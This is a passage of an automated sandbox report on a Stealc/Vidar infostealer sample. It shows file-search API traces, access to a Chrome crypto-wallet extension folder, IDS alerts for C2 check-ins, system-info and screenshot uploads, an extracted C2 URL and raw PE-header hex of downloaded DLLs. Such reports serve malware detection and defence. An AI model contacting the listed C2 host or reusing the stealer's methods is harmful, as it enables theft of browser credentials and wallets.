Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:50098 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: DbMBWMxoNv.exe, 00000000.00000002.1930028045.000000007013D000.00000002.00000001.01000000.00000014.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: my_library.pdbU source: DbMBWMxoNv.exe, 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929824193.000000006D121000.00000002.00000001.01000000.00000007.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: my_library.pdb source: DbMBWMxoNv.exe, DbMBWMxoNv.exe, 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929824193.000000006D121000.00000002.00000001.01000000.00000007.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: M:\BACKUP\SOFT\Ledger\LedgerConsole_v1\LedgerLiveClient\Ledger-Live\obj\Release\Ledger-Live.pdbtQ source: RoamingEBFBKKJECA.exe, 00000015.00000000.1840445425.00000000001A2000.00000002.00000001.01000000.00000015.sdmp, RoamingEBFBKKJECA.exe.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: DbMBWMxoNv.exe, 00000000.00000002.1930028045.000000007013D000.00000002.00000001.01000000.00000014.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: M:\BACKUP\SOFT\Ledger\LedgerConsole_v1\LedgerLiveClient\Ledger-Live\obj\Release\Ledger-Live.pdb source: RoamingEBFBKKJECA.exe, 00000015.00000000.1840445425.00000000001A2000.00000002.00000001.01000000.00000015.sdmp, RoamingEBFBKKJECA.exe.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 62.204.41.163:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49700 -> 62.204.41.163:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 62.204.41.163:80 -> 192.168.2.7:49700
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49700 -> 62.204.41.163:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 62.204.41.163:80 -> 192.168.2.7:49700
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49700 -> 62.204.41.163:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.7:49933 -> 62.204.41.163:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://62.204.41.163/c882d91d1df1bdb3.php
Source: Malware configuration extractor	URLs: http://62.204.41.163/c882d91d1df1bdb3.php

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000

Source: global traffic

TCP traffic: 192.168.2.7:49813 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:56:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:56:54 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:56:56 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:56:58 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 16:56:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 